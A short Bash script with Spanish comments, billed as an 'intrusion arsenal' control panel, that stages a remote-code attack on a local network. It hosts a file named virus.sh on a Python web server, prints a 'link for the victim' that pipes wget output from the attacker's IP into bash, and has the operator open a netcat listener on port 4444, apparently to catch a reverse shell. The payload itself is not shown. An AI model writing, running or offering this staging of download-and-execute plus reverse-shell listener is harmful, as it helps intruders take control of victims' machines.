#!/bin/bash
# Definimos nuestra IP manualmente para evitar errores
MI_IP="192.168.1.109"

echo "----------------------------------------------------"
echo "  ARSENAL DE INTRUSIÓN - PANEL DE CONTROL"
echo "----------------------------------------------------"
echo "1. Tu IP es: $MI_IP"
echo "2. Link para la víctima:"
echo "   wget -qO- http://192.168.1.109:8080/virus.sh | bash"
echo "----------------------------------------------------"

# Lanzamos el servidor de archivos
python3 -m http.server 8080 & 
SERV_PID=$!

echo "Servidor listo (PID: $SERV_PID). Abre otra terminal y escribe:"
echo "nc -lvnp 4444"
echo "----------------------------------------------------"


